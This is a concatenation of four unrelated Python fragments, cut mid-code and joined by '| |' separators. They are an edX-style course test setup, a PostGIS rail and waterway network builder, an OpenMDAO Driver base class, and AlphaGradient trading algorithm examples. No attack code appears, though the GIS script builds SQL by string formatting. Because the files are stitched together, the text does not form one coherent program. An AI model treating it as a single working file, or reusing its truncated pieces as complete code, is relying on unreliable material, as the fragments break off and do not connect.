modulestore=self.store,
publish_item=True,
start=datetime(2015, 3, 1, tzinfo=UTC),
)
self.sequential2 = ItemFactory.create(
parent_location=self.chapter.location,
category='sequential',
display_name="Lesson 2",
modulestore=self.store,
publish_item=True,
start=datetime(2015, 3, 1, tzinfo=UTC),
)
self.vertical = ItemFactory.create(
parent_location=self.sequential.location,
category='vertical',
display_name='Subsection 1',
modulestore=self.store,
publish_item=True,
start=datetime(2015, 4, 1, tzinfo=UTC),
)
self.vertical2 = ItemFactory.create(
parent_location=self.sequential.location,
category='vertical',
display_name='Subsection 2',
modulestore=self.store,
publish_item=True,
start=datetime(2015, 4, 1, tzinfo=UTC),
)
self.vertical3 = ItemFactory.create(
parent_location=self.sequential2.location,
category='vertical',
display_name='Subsection 3',
modulestore=self.store,
publish_item=True,
start=datetime(2015, 4, 1, tzinfo=UTC),
)
# unspecified start - should inherit from container
self.html_unit1 = ItemFactory.create(
parent_location=self.vertical.location,
category="html",
display_name="Html Content 1",
modulestore=self.store,
publish_item=True,
)
self.html_unit1.parent = self.vertical
self.html_unit2 = ItemFactory.create(
parent_location=self.vertical2.location,
category="html",
display_name="Html Content 2",
modulestore=self.store,
publish_item=True,
)
self.html_unit2.parent = self.vertical2
self.html_unit3 = ItemFactory.create(
parent_location=self.vertical2.location,
category="html",
display_name="Html Content 3",
modulestore=self.store,
publish_item=True,
)
self.html_unit3.parent = self.vertical2
def _setup_split_test_module(self):
"""
Set up split test | |
f.GetField('elr')
pt_tup_list.append((n,frac))
f.Destroy()
f = read_layer.GetNextFeature()
# print pt_id_list
# print pt_frac_list
# print pt_dist_list
'''
ST_Line_Substring
'''
if len(pt_tup_list) > 0:
pt_id_sorted = [x for (x,y) in sorted(pt_tup_list, key=lambda pair: pair[1])]
pt_frac_sorted = [y for (x,y) in sorted(pt_tup_list, key=lambda pair: pair[1])]
if min(pt_frac_sorted) > 0:
pt_frac_sorted = [0] + pt_frac_sorted
pt_id_sorted = [st_pt] + pt_id_sorted
if max(pt_frac_sorted) < 1:
pt_frac_sorted = pt_frac_sorted + [1]
pt_id_sorted = pt_id_sorted + [en_pt]
for p in range(len(pt_frac_sorted)-1):
e_id = e_id + 1
pt_st_frac = pt_frac_sorted[p]
pt_en_frac = pt_frac_sorted[p+1]
nf_id = pt_id_sorted[p]
nt_id = pt_id_sorted[p+1]
eid = 'wateredge_' + str(e_id)
sql_insert = '''INSERT INTO public.wateredges
(edge_id,node_f_id,node_t_id,gid,geom)
VALUES ('{0}','{1}','{2}',{3},
ST_GeomFromText((SELECT ST_AsText(ST_Line_Substring(geom,{4},{5}))
FROM wateredges WHERE edge_id = '{6}'),4326)
)'''.format(eid,nf_id,nt_id,elr,pt_st_frac,pt_en_frac,lc)
create_layer = conn2.ExecuteSQL(sql_insert)
sql_delete = '''DELETE FROM public.wateredges
WHERE edge_id = '{0}'
'''.format(lc)
delete_layer = conn2.ExecuteSQL(sql_delete)
add_columns_to_table('wateredges', 'waterroutes', ['eid'], ['character varying'],'gid', cur, conn)
add_columns_to_table('waternodes', 'waterports', ['nid'], ['character varying'],'gid', cur, conn)
add_columns_to_table_match_columns('wateredges', 'waterwayedges', ['link','speed'], ['character varying','double precision'],'eid','edge_id', cur, conn)
add_columns_to_table_match_columns('waternodes', 'seaport_nodes', ['ten_cang','tinh'], ['character varying','character varying'],'nid','node_id', cur, conn)
# print (nid_lid_list)
# add_new_id_column('seaport_nodes','seanode_','node_id','gid',cur, conn)
'''
STEP 2:
Transform the multilinestring geometry to a linestring geometry
Create new railway edge table converting the multilinestrings to linestrings
'''
node_id = 'gid'
edge_id = 'gid'
node_layer = 'railway_nodes'
edge_layer = 'railway_edges'
node_attr = 'railwaylin'
edge_attr = 'railwaylin'
sql_query = '''DROP TABLE IF EXISTS
public.railway_edges_linegeom
'''
sql_create = conn2.ExecuteSQL(sql_query)
sql_query = '''CREATE TABLE public.railway_edges_linegeom
(
gid integer,
linename character varying(254),
geom geometry(LineString,4326)
)
'''
sql_create = conn2.ExecuteSQL(sql_query)
line_id_list = []
new_edge_id = 0
sql_query = '''SELECT {0}, ST_AsText(geom) FROM {1}'''.format(edge_attr,edge_layer)
cur.execute(sql_query)
read_layer = cur.fetchall()
for row in read_layer:
link = row[0]
gt = row[1]
# print (gt)
if gt is not None:
g_x,g_y = get_geom_points(gt)
# line_create = ogr.Geometry(ogr.wkbLineString)
for j in range(0,len(g_x)):
line_create = ogr.Geometry(ogr.wkbLineString)
for i in range(0,len(g_x[j])):
pt_x = g_x[j][i]
pt_y = g_y[j][i]
line_create.AddPoint_2D(pt_x,pt_y)
line_gtext = line_create.ExportToWkt()
new_edge_id += 1
line_id_list.append(new_edge_id)
sql_query = '''INSERT INTO railway_edges_linegeom (gid,linename,geom)
VALUES ({0},'{1}',ST_GeomFromText('{2}',4326))
'''.format(new_edge_id,link,str(line_gtext))
cur.execute(sql_query)
conn.commit()
'''
STEP 3:
Select the nodes and their matching edges
'''
edge_layer = 'railway_edges_linegeom'
edge_attr = 'linename'
nid_lid_list = []
sql_query = '''SELECT A.{0} as nid,
(select B.{1} from {2} as B order by st_distance(A.geom,B.geom) asc limit 1) as lid,
COALESCE((select B.{3} from {4} as B where A.{5} = B.{6} order by st_distance(A.geom,B.geom) asc limit 1),-9999) as sbid_lid,
(select ST_distance(A.geom,B.geom) from {7} as B order by st_distance(A.geom,B.geom) asc limit 1) as cl_dist,
COALESCE((select ST_distance(A.geom,B.geom) from {8} as B where A.{9} = B.{10} order by st_distance(A.geom,B.geom) asc limit 1),-9999) as sbid_dist
from {11} as A
'''.format(node_id,edge_id,edge_layer,edge_id,edge_layer,node_attr,edge_attr,edge_layer,edge_layer,node_attr,edge_attr,node_layer)
read_layer = conn2.ExecuteSQL(sql_query)
f = read_layer.GetNextFeature()
while f is not None:
nid = f.GetField('nid')
lid = f.GetField('lid')
sbid_lid = f.GetField('sbid_lid')
cl_dist = f.GetField('cl_dist')
sbid_dist = f.GetField('sbid_dist')
if lid != sbid_lid:
if cl_dist > 100:
match = 0
if sbid_dist > 0:
'''
Match the station point to the line with the same business code
'''
nid_lid_list.append((nid,sbid_lid,match))
else:
'''
Match the station point to the closest line
'''
nid_lid_list.append((nid,lid,match))
else:
match = 1
if abs(sbid_dist - cl_dist) < 20:
'''
Match the station point to the line with the same business code
'''
nid_lid_list.append((nid,sbid_lid,match))
else:
'''
Match the station point to the closest line
'''
nid_lid_list.append((nid,lid,match))
else:
match = 1
'''
Match the station point to the line with the same business code
'''
nid_lid_list.append((nid,sbid_lid,match))
f.Destroy()
f = read_layer.GetNextFeature()
# print (nid_lid_list)
'''
STEP 4:
We will create the new edge and node layers
'''
'''
create the edge layer
'''
sql_query = '''DROP TABLE IF EXISTS
public.railnetworkedges
'''
sql_create = conn2.ExecuteSQL(sql_query)
sql_query = '''CREATE TABLE public.railnetworkedges
(
edge_id character varying(254),
node_f_id character varying(254),
node_t_id character varying(254),
gid integer,
geom geometry(LineString,4326)
)
'''
sql_create = conn2.ExecuteSQL(sql_query)
'''
create the node layer
'''
sql_query = '''DROP TABLE IF EXISTS
public.railnetworknodes
'''
sql_create = conn2.ExecuteSQL(sql_query)
sql_query = '''CREATE TABLE public.railnetworknodes
(
node_id character varying(254),
gid integer,
geom geometry(Point,4326)
)
'''
sql_create = conn2.ExecuteSQL(sql_query)
'''
STEP 4:
Create the first iteration of the network nodes and egde sets
Based on the station points to rail line matches done in STEP 4
'''
u_lines = list(set(line_id_list))
dummy_pt = 20000
e_id = 0
network_list = []
for item in range(len(u_lines)):
lc = u_lines[item]
nlist = [(n,m) for (n,l,m) in nid_lid_list if l == lc]
if len(nlist) > 0:
'''
Find the nodes which have some edge matches
'''
nl = [n for (n,m) in nlist if m == 1]
if len(nl) > 0:
nl = nl + [0]
pt_tup_list = []
sql_query = '''SELECT A.{0} AS nid,
ST_AsText(ST_ClosestPoint(B.geom,A.geom)) AS pt_geom,
ST_Line_Locate_Point(B.geom,ST_ClosestPoint(B.geom,A.geom)) as frac,
ST_AsText(ST_StartPoint(B.geom)) as st_pt, ST_AsText(ST_EndPoint(B.geom)) as en_pt,
ST_Distance(ST_ClosestPoint(B.geom,A.geom),ST_StartPoint(B.geom)) as st_pt_dist,
ST_Distance(ST_ClosestPoint(B.geom,A.geom),ST_EndPoint(B.geom)) as en_pt_dist
FROM {1} AS A,
{2} AS B
WHERE A.{3} IN {4}
AND B.{5} = {6}
'''.format(node_id,node_layer,edge_layer,node_id,str(tuple(nl)),edge_id,lc)
read_layer = conn2.ExecuteSQL(sql_query)
f = read_layer.GetNextFeature()
while f is not None:
nid = f.GetField('nid')
pt_geom = f.GetField('pt_geom')
frac = f.GetField('frac')
st_pt = f.GetField('st_pt')
en_pt = f.GetField('en_pt')
st_pt_dist = f.GetField('st_pt_dist')
en_pt_dist = f.GetField('en_pt_dist')
pt_tup_list.append((nid,pt_geom,st_pt_dist,en_pt_dist,frac))
f.Destroy()
f = read_layer.GetNextFeature()
'''
ST_Line_Substring
'''
if len(pt_tup_list) > 0:
pt_id_sorted = [p for (p,w,x,y,z) in sorted(pt_tup_list, key=lambda pair: pair[-1])]
pt_geom_sorted = [w for (p,w,x,y,z) in sorted(pt_tup_list, key=lambda pair: pair[-1])]
pt_dist_st_sorted = [x for (p,w,x,y,z) in sorted(pt_tup_list, key=lambda pair: pair[-1])]
pt_dist_en_sorted = [y for (p,w,x,y,z) in sorted(pt_tup_list, key=lambda pair: pair[-1])]
pt_frac_sorted = [z for (p,w,x,y,z) in sorted(pt_tup_list, key=lambda pair: pair[-1])]
if pt_dist_st_sorted[0] < 1e-10:
pt_frac_sorted[0] = 0
pt_geom_sorted[0] = st_pt
if pt_dist_en_sorted[-1] < 1e-10:
pt_frac_sorted[-1] = 1
pt_geom_sorted[-1] = en_pt
if min(pt_frac_sorted) > 0:
pt_frac_sorted = [0] + pt_frac_sorted
dummy_pt = dummy_pt + 1
# pt_info = (dummy_pt,'No name','No type','No code','No name',elr,'No code')
pt_id_sorted = [dummy_pt] + pt_id_sorted
pt_geom_sorted = [st_pt] + pt_geom_sorted
if max(pt_frac_sorted) < 1:
pt_frac_sorted = pt_frac_sorted + [1]
dummy_pt = dummy_pt + 1
# pt_info = (dummy_pt,'No name','No type','No code','No name',elr,'No code')
pt_id_sorted = pt_id_sorted + [dummy_pt]
pt_geom_sorted = pt_geom_sorted + [en_pt]
for p in range(len(pt_frac_sorted)-1):
e_id = e_id + 1
eid = 'railedge_' + str(e_id)
pt_st_frac = pt_frac_sorted[p]
pt_en_frac = pt_frac_sorted[p+1]
nf_id = pt_id_sorted[p]
nt_id = pt_id_sorted[p+1]
# print (pt_st_frac,pt_en_frac)
nfid = 'railnode_' + str(nf_id)
ntid = 'railnode_' + str(nt_id)
sql_insert = '''INSERT INTO public.railnetworkedges
(edge_id,node_f_id,node_t_id,gid,geom)
VALUES ('{0}','{1}','{2}',{3},
ST_GeomFromText((SELECT ST_AsText(ST_Line_Substring(geom,{4},{5}))
FROM {6} WHERE {7} = {8}),4326)
)'''.format(eid,nfid,ntid,lc,pt_st_frac,pt_en_frac,edge_layer,edge_id,lc)
create_layer = conn2.ExecuteSQL(sql_insert)
# sql_insert = '''SELECT ST_AsText(ST_Line_Substring(geom,{0},{1})) as gtext
# FROM {2} WHERE {3} = {4}
# '''.format(pt_st_frac,pt_en_frac,edge_layer,edge_id,lc)
# read_layer = conn2.ExecuteSQL(sql_insert)
# f = read_layer.GetNextFeature()
# while f is not None:
# gt = f.GetField('gtext')
# f.Destroy()
# f = read_layer.GetNextFeature()
# network_list.append((e_id,nf_id,nt_id,lc,gt))
for p in range(len(pt_id_sorted)):
n_id = pt_id_sorted[p]
nid = 'railnode_' + str(n_id)
pt = pt_geom_sorted[p]
sql_insert = '''INSERT INTO public.railnetworknodes
(node_id,gid,geom)
VALUES ('{0}',{1},ST_GeomFromText('{2}',4326))
'''.format(nid,n_id,pt)
create_layer = conn2.ExecuteSQL(sql_insert)
# # sql_insert = '''INSERT INTO public.railnetworknodes
# # (node_id,name,type,fo_code,fo_name,elr_code,stn_code,geom)
# # VALUES (%s,'%s','%s','%s','%s','%s','%s',
# # ST_GeomFromText('%s',27700))
# # '''%(n_id,n_a,t_y,f_c,f_n,e_l,s_t,pt)
# # create_layer = conn2.ExecuteSQL(sql_insert)
# else:
# sql_insert = '''INSERT INTO public.railnetworknodes
# (node_id,name,type,fo_code,fo_name,elr_code,stn_code,geom)
# VALUES (%s,'No name','No type','No code','No name','%s','No code',
# ST_GeomFromText('%s',27700))
# '''%(n_id,elr,pt)
# create_layer = conn2.ExecuteSQL(sql_insert)
'''
Find the nodes which have no edge matches
'''
# nl = [n for (n,m) in nlist if m == 0]
# if len(nl) > 0:
# for n in nl:
# sql_insert = '''INSERT INTO public.railnetworknodes
# (node_id,name,type,fo_code,fo_name,elr_code,stn_code,geom)
# VALUES (%s,
# (SELECT name
# FROM public.stationspoint WHERE ogc_fid = %s),
# (SELECT type
# FROM public.stationspoint WHERE ogc_fid = %s),
# (SELECT fo_code
# FROM public.stationspoint WHERE ogc_fid = %s),
# (SELECT fo_name
# FROM public.stationspoint WHERE ogc_fid = %s),
# (SELECT primary_el
# FROM public.stationspoint WHERE ogc_fid = %s),
# (SELECT stn_code
# FROM public.stationspoint WHERE ogc_fid = %s),
# ST_GeomFromText((SELECT ST_AsText(geom)
# FROM public.stationspoint WHERE ogc_fid = %s),27700))
# '''%(n,n,n,n,n,n,n,n)
# create_layer = conn2.ExecuteSQL(sql_insert)
else:
sql_query = '''SELECT ST_AsText(geom) AS l_geom,
ST_AsText(ST_StartPoint(geom)) as st_pt,
ST_AsText(ST_EndPoint(geom)) as en_pt
FROM {0}
WHERE gid = {1}
'''.format(edge_layer,lc)
read_layer = conn2.ExecuteSQL(sql_query)
f = read_layer.GetNextFeature()
while f is not None:
gt = f.GetField('l_geom')
st_pt = f.GetField('st_pt')
en_pt = f.GetField('en_pt')
dummy_pt = dummy_pt + 1
nf_id = dummy_pt
dummy_pt = dummy_pt + 1
nt_id = dummy_pt
# edge_id = edge_id + 1
e_id += 1
# network_list.append((e_id,nf_id,nt_id,lc,gt))
eid = 'railedge_' + str(e_id)
nfid = 'railnode_' + str(nf_id)
ntid = 'railnode_' + str(nt_id)
sql_insert = '''INSERT INTO public.railnetworkedges
(edge_id,node_f_id,node_t_id,gid,geom)
VALUES ('{0}','{1}','{2}',{3},
ST_GeomFromText('{4}',4326))
'''.format(eid,nfid,ntid,lc,gt)
create_layer = conn2.ExecuteSQL(sql_insert)
sql_insert = '''INSERT INTO public.railnetworknodes
(node_id,gid,geom)
VALUES ('{0}',{1},
ST_GeomFromText('{2}',4326))
'''.format(nfid,nf_id,st_pt)
create_layer = conn2.ExecuteSQL(sql_insert)
sql_insert = '''INSERT INTO public.railnetworknodes
(node_id,gid,geom)
VALUES ('{0}',{1},
ST_GeomFromText('{2}',4326))
'''.format(ntid,nt_id,en_pt)
create_layer = conn2.ExecuteSQL(sql_insert)
f.Destroy()
f = read_layer.GetNextFeature()
print ('done with line number %s with code %s'%(item,lc))
# df = pd.DataFrame(network_list,columns = ['edge_id','node_f_id','node_t_id','line_code','geom'])
# df.to_csv('rail_network.csv',index = False)
'''
STEP 6:
Remove the common nodes from the node and edge sets
If two nodes are within 10m of each other, they are considered the same node
'''
node_s_pairs = []
sql_query = '''SELECT A.node_id as a_n, B.node_id as b_n
from railnetworknodes as A, railnetworknodes as B
where ST_Distance(A.geom::geography,B.geom::geography) = 0
and A.node_id != B.node_id
'''
read_layer = conn2.ExecuteSQL(sql_query)
f = read_layer.GetNextFeature()
while f is not None:
a_n = f.GetField('a_n')
b_n = f.GetField('b_n')
if ([a_n,b_n] not in node_s_pairs) and ([b_n,a_n] not in node_s_pairs):
node_s_pairs.append([a_n,b_n])
f.Destroy()
f = read_layer.GetNextFeature()
# print len(node_s_pairs)
# print node_s_pairs[0:10]
'''
Get all the groups of common nodes
'''
'''
Sample list
l = [['a', 'b', 'c'], ['b', 'd', 'e'], ['k'], ['o', 'p'], ['e', 'f'], ['p', 'a'], ['d', 'g']]
'''
l = copy.deepcopy(node_s_pairs)
out = []
while len(l)>0:
first, rest = l[0], l[1:]
first = set(first)
lf = -1
while len(first)>lf:
lf = len(first)
rest2 = []
for r in rest:
if len(first.intersection(set(r)))>0:
first |= set(r)
else:
rest2.append(r)
rest = rest2
out.append(first)
l = rest
# print(len(out))
# print out[0:10]
'''
Test it!
'''
for i in out:
nodes = sorted(list(i))
del_nodes = nodes[1:] + ['0']
sql_update = '''UPDATE railnetworkedges SET node_f_id = '{0}'
WHERE node_f_id IN {1}
'''.format(nodes[0],str(tuple(nodes)))
update_layer = conn2.ExecuteSQL(sql_update)
sql_update = '''UPDATE railnetworkedges SET node_t_id = '{0}'
WHERE node_t_id IN {1}
'''.format(nodes[0],str(tuple(nodes)))
update_layer = conn2.ExecuteSQL(sql_update)
sql_delete = '''DELETE FROM railnetworknodes
WHERE node_id IN {0}
'''.format(str(tuple(del_nodes)))
delete_layer = conn2.ExecuteSQL(sql_delete)
'''
STEP 7:
Get all the nodes with degree 1 and find if they are close to other edges
'''
cl_edges = []
nodes_edges = []
sql_query = '''SELECT A.node_id as a_n,
(SELECT B.edge_id from railnetworkedges as B where B.edge_id NOT IN (SELECT edge_id FROM railnetworkedges WHERE node_f_id = A.node_id)
and B.edge_id NOT IN (SELECT edge_id FROM railnetworkedges WHERE node_t_id = A.node_id) order by st_distance(A.geom,B.geom) asc limit 1) as b_n,
(SELECT ST_Distance(A.geom,B.geom)from railnetworkedges as B where B.edge_id NOT IN (SELECT edge_id FROM railnetworkedges WHERE node_f_id = A.node_id)
and B.edge_id NOT IN (SELECT edge_id FROM railnetworkedges WHERE node_t_id = A.node_id) order by st_distance(A.geom,B.geom) asc limit 1) as dist, A.geom
FROM railnetworknodes as A
'''
read_layer | |
<reponame>jcchin/project_clippy
""" Base class for Driver."""
from collections import OrderedDict
from itertools import chain
from six import iteritems
import numpy as np
from openmdao.core.options import OptionsDictionary
from openmdao.util.record_util import create_local_meta, update_local_meta
class Driver(object):
""" Base class for drivers in OpenMDAO. Drivers can only be placed in a
Problem, and every problem has a Driver. Driver is the simplest driver that
runs (solves using solve_nonlinear) a problem once.
"""
def __init__(self):
super(Driver, self).__init__()
self.recorders = []
# What this driver supports
self.supports = OptionsDictionary(read_only=True)
self.supports.add_option('inequality_constraints', True)
self.supports.add_option('equality_constraints', True)
self.supports.add_option('linear_constraints', False)
self.supports.add_option('multiple_objectives', False)
self.supports.add_option('two_sided_constraints', False)
self.supports.add_option('integer_parameters', False)
# This driver's options
self.options = OptionsDictionary()
self._params = OrderedDict()
self._objs = OrderedDict()
self._cons = OrderedDict()
self._voi_sets = []
# We take root during setup
self.root = None
self.iter_count = 0
def _setup(self, root):
""" Prepares some things we need."""
self.root = root
item_names = ['Parameter', 'Objective', 'Constraint']
items = [self._params, self._objs, self._cons]
for item, item_name in zip(items, item_names):
for name, meta in iteritems(item):
# Check validity of variable
if name not in root.unknowns:
msg = "{} '{}' not found in unknowns."
msg = msg.format(item_name, name)
raise ValueError(msg)
# Size is useful metadata to save
if 'indices' in meta:
meta['size'] = len(meta['indices'])
else:
meta['size'] = root.unknowns.metadata(name)['size']
def _map_voi_indices(self):
poi_indices = {}
qoi_indices = {}
for name, meta in chain(iteritems(self._cons), iteritems(self._objs)):
# set indices of interest
if 'indices' in meta:
qoi_indices[name] = meta['indices']
for name, meta in iteritems(self._params):
# set indices of interest
if 'indices' in meta:
poi_indices[name] = meta['indices']
return poi_indices, qoi_indices
def _of_interest(self, voi_list):
"""Return a list of tuples, with the given voi_list organized
into tuples based on the previously defined grouping of VOIs.
"""
vois = []
done_sets = set()
for v in voi_list:
for voi_set in self._voi_sets:
if voi_set in done_sets:
break
if v in voi_set:
vois.append(tuple([x for x in voi_set
if x in voi_list]))
done_sets.add(voi_set)
break
else:
vois.append((v,))
return vois
def params_of_interest(self):
"""
Returns
-------
list of tuples of str
The list of params, organized into tuples according to previously
defined VOI groups.
"""
return self._of_interest(self._params)
def outputs_of_interest(self):
"""
Returns
-------
list of tuples of str
The list of constraints and objectives, organized into tuples
according to previously defined VOI groups.
"""
return self._of_interest(list(chain(self._objs, self._cons)))
def parallel_derivs(self, vnames):
"""
Specifies that the named variables of interest are to be grouped
together so that their derivatives can be solved for concurrently.
Args
----
vnames : iter of str
The names of variables of interest that are to be grouped.
"""
for grp in self._voi_sets:
for vname in vnames:
if vname in grp:
msg = "'%s' cannot be added to VOI set %s because it " + \
"already exists in VOI set: %s"
raise RuntimeError(msg % (vname, tuple(vnames), grp))
param_intsect = set(vnames).intersection(self._params.keys())
if param_intsect and len(param_intsect) != len(vnames):
raise RuntimeError("%s cannot be grouped because %s are params and %s are not." %
(vnames, list(param_intsect),
list(set(vnames).difference(param_intsect))))
self._voi_sets.append(tuple(vnames))
def add_recorder(self, recorder):
"""
Adds a recorder to the driver.
Args
----
recorder : BaseRecorder
A recorder instance.
"""
self.recorders.append(recorder)
def add_param(self, name, low=None, high=None, indices=None, adder=0.0, scaler=1.0):
"""
Adds a parameter to this driver.
Args
----
name : string
Name of the paramcomp in the root system.
low : float or ndarray, optional
Lower boundary for the param
high : upper or ndarray, optional
Lower boundary for the param
indices : iter of int, optional
If a param is an array, these indicate which entries are of
interest for derivatives.
adder : float or ndarray, optional
Value to add to the model value to get the scaled value. Adder
is first in precedence.
scaler : float or ndarray, optional
value to multiply the model value to get the scaled value. Scaler
is second in precedence.
"""
if low is None:
low = -1e99
elif isinstance(low, np.ndarray):
low = low.flatten()
if high is None:
high = 1e99
elif isinstance(high, np.ndarray):
high = high.flatten()
if isinstance(adder, np.ndarray):
adder = adder.flatten()
if isinstance(scaler, np.ndarray):
scaler = scaler.flatten()
# Scale the low and high values
low = (low + adder)*scaler
high = (high + adder)*scaler
param = {}
param['low'] = low
param['high'] = high
param['adder'] = adder
param['scaler'] = scaler
if indices:
param['indices'] = np.array(indices, dtype=int)
self._params[name] = param
def get_params(self):
""" Returns a dict of parameters.
Returns
-------
dict
Keys are the param object names, and the values are the param
values.
"""
uvec = self.root.unknowns
params = OrderedDict()
for key, meta in iteritems(self._params):
scaler = meta['scaler']
adder = meta['adder']
flatval = uvec.flat[key]
if 'indices' in meta:
# Make sure our indices are valid
try:
flatval = flatval[meta['indices']]
except IndexError:
msg = "Index for parameter '{}' is out of bounds. "
msg += "Requested index: {}, "
msg += "Parameter shape: {}."
raise IndexError(msg.format(key, meta['indices'],
uvec.metadata(key)['shape']))
if isinstance(scaler, np.ndarray) or isinstance(adder, np.ndarray) \
or scaler != 1.0 or adder != 0.0:
params[key] = (flatval + adder)*scaler
else:
params[key] = flatval
return params
def get_param_metadata(self):
""" Returns a dict of parameter metadata.
Returns
-------
dict
Keys are the param object names, and the values are the param
values.
"""
return self._params
def set_param(self, name, value):
""" Sets a parameter.
Args
----
name : string
Name of the paramcomp in the root system.
val : ndarray or float
value to set the parameter
"""
scaler = self._params[name]['scaler']
adder = self._params[name]['adder']
if isinstance(scaler, np.ndarray) or isinstance(adder, np.ndarray) \
or scaler != 1.0 or adder != 0.0:
self.root.unknowns[name] = value/scaler - adder
else:
self.root.unknowns[name] = value
def add_objective(self, name, indices=None, adder=0.0, scaler=1.0):
""" Adds an objective to this driver.
Args
----
name : string
Promoted pathname of the output that will serve as the objective.
indices : iter of int, optional
If an objective is an array, these indicate which entries are of
interest for derivatives.
adder : float or ndarray, optional
Value to add to the model value to get the scaled value. Adder
is first in precedence.
scaler : float or ndarray, optional
value to multiply the model value to get the scaled value. Scaler
is second in precedence.
"""
if isinstance(adder, np.ndarray):
adder = adder.flatten()
if isinstance(scaler, np.ndarray):
scaler = scaler.flatten()
obj = {}
obj['adder'] = adder
obj['scaler'] = scaler
if indices:
obj['indices'] = indices
if len(indices) > 1 and not self.supports['multiple_objectives']:
raise RuntimeError("Multiple objective indices specified for "
"variable '%s', but driver '%s' doesn't "
"support multiple objectives." %
(name, self.pathname))
self._objs[name] = obj
def get_objectives(self, return_type='dict'):
""" Gets all objectives of this driver.
Args
----
return_type : string
Set to 'dict' to return a dictionary, or set to 'array' to return a
flat ndarray.
Returns
-------
dict (for return_type 'dict')
Key is the objective name string, value is an ndarray with the values.
ndarray (for return_type 'array')
Array containing all objective values in the order they were added.
"""
uvec = self.root.unknowns
objs = OrderedDict()
for key, meta in iteritems(self._objs):
scaler = meta['scaler']
adder = meta['adder']
flatval = uvec.flat[key]
if 'indices' in meta:
# Make sure our indices are valid
try:
flatval = flatval[meta['indices']]
except IndexError:
msg = "Index for objective '{}' is out of bounds. "
msg += "Requested index: {}, "
msg += "Parameter shape: {}."
raise IndexError(msg.format(key, meta['indices'],
uvec.metadata(key)['shape']))
if isinstance(scaler, np.ndarray) or isinstance(adder, np.ndarray) \
or adder != 0.0 or scaler != 1.0:
objs[key] = (flatval + adder)*scaler
else:
objs[key] = flatval
return objs
def add_constraint(self, name, ctype='ineq', linear=False, jacs=None,
indices=None, adder=0.0, scaler=1.0):
""" Adds a constraint to this driver.
Args
----
name : string
Promoted pathname of the output that will serve as the objective.
ctype : string
Set to 'ineq' for inequality constraints, or 'eq' for equality
constraints. Make sure your driver supports the ctype of constraint
that you are adding.
linear : bool, optional
Set to True if this constraint is linear with respect to all params
so that it can be calculated once and cached.
jacs : | |
<reponame>nathanheidacker/AlphaGradient<gh_stars>0
# -*- coding: utf-8 -*-
"""
AlphaGradient's algorithm library is a collection of financial algorithms built
using AlphaGradient. These algorithms are public domain and free to use. We
highly encourage the open-sourcing of algorithms, as it contributes to a
vibrant and lively community and helps others learn. If you've developed an
algorithm using AlphaGradient that you'd like to make publicly available to
all AlphaGradient users, see our page on :ref:`publishing an algorithm <algolib.publish>`.
All of the algorithms contained within the algorithm library are licensed under
the Apache 2.0 license. See `alphagradient.license` for more information.
"""
# Standard Imports
import os
import math
from datetime import datetime, timedelta
# Third Party imports
import numpy as np
# Local Imports
from .. import _proxy as ag
# Typing
from typing import (
Any,
)
class IndexHold(ag.Algorithm):
"""A tutorial algorithm! Buy and Hold!"""
def setup(self, start: datetime, **kwargs: Any) -> ag.Environment:
"""
This algorithm only requires a single index fund to invest in, so it
uses the default AG benchmark SPY. No other assets are instantiated.
Only a single portfolio ("MAIN") is used.
Parameters:
start:
The starting datetime of the backtest is required to properly
setup the environment
"""
# Our initial balance
initial = 1_000_000
spy = ag.Stock("SPY")
# Creating an environment object
env = ag.Environment(assets=[spy])
# identical to env.main.invest(initial)
env.invest(initial)
# Calling this drastically improves runtime performance
env.finalize()
return env
def cycle(self, start: datetime, end: datetime, **kwargs: Any) -> None:
"""
The goals of this algorithm are very simple,
"""
# Buying at the start...
if self.date <= datetime.fromisoformat("2010-01-04 16:00:00"):
# Determining how much we can afford
to_buy = math.floor(self.env.liquid / self.env.stock.spy.value)
# This buys the asset on the main portfolio
self.env.buy(self.env.stock.spy, to_buy)
# And holding till the end!
elif self.date >= (end - timedelta(days=1)):
# Selling everything
self.env.liquidate()
class ThetaGang(ag.Algorithm):
"""
An example algorithm in the algorithm library used to demonstrate some of
AlphaGradient's standard features and best practices
This is a tutorial algorithm that seeks to demonstrate some of AlphaGradient's
features and standard design practices. This algorithm sells the maximum number
of covered calls on SPY that it can, with a bounded strike price to prevent from
selling calls that could lose money when assigned
Here's a breakdown:
#. | At the beginning of the day, buy as many shares of SPY as we can to the
| nearest multiple of 100
#. | Using SPY shares as collateral, sells 1 DTE covered calls on SPY where
| the strike is determined by SPY's current value. The algorithm will never
| sell a call with a strike below it's average cost for the shares it owns.
| This prevents it from losing money in the case of call assignment.
#. | The strike bounding component of 2) is toggle-able by instantiating with
| bounded=False
"""
def __init__(self, *args: Any, bounded: bool = True, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
# Determines whether or not a lower bound should be placed on the strike
self.bounded = bounded
def setup(self, start: datetime, **kwargs: Any) -> ag.Environment:
"""This is the environement setup that is performed before each backtest. Must return an environment object"""
# Creating a basket with the given start parameter
env = ag.Environment()
# Creating SPY stock, attaching it to self (will be referenced frequently)
# This call to the stock() method both instantiates the stock within the environment, AND returns it
self.spy = env.stock("SPY")
# Creating the stock normally like so:
# self.spy = ag.finance.Stock("SPY")
# will NOT allow the environment to track it or update its value data as time progresses
# Initial investment into the primary portfolio
env.invest(self.spy.value * 150)
# We only want the algorithm to evaluate at market open and close of each day
# Finalizing will dramatically increase execution time, but is not necessary
env.finalize(manual=["9:30 AM", "4:00 PM"])
return env
def cycle(self, **kwargs: Any) -> None:
"""The actions to perform at every valuation point"""
# Selling as many covered calls on SPY as we can
self.env.covered_call(self.generate_call())
# The above line of code is a shortcut for:
# self.env.main.covered_call(self.generate_call())
# Showing the changes at every time step
self.print(self.stats.change_report())
def generate_call(self, delta: float = 1) -> ag.Call:
"""Generates the ideal SPY call to be sold based on current circumstances"""
# Getting our current position in the Asset <STOCK SPY>
spy_position = self.env.get_position(self.spy)
# Determining our optimal strike price
optimal = math.floor(self.spy.value) + delta
# Determining a lower bound for our strike price (the ceiling of our basis)
lower_bound = optimal
if spy_position and self.bounded:
lower_bound = math.ceil(spy_position.average_cost)
# Determining our strike price
strike = max(optimal, lower_bound)
# Determining the call expiry date (1 DTE)
expiry = self.env.date + timedelta(days=1)
# We can't sell calls with expiries on weekends or outside of market hours
expiry = ag.utils.nearest_expiry(expiry)
# Creating the call using the environment so that it doesnt have to be added retroactively
return self.env.call(self.spy, strike, expiry)
class TemplateAlgo(ag.Algorithm):
"""
Shows how to create and document an AlphaGradient algorithm
This section of the algorithm should contain documentation about what the
algorithm aims to accomplish in general, the theory that it operates on in
order to accomplish those aims, as well as important implementation details
on how specifically this algorithm models that theory.
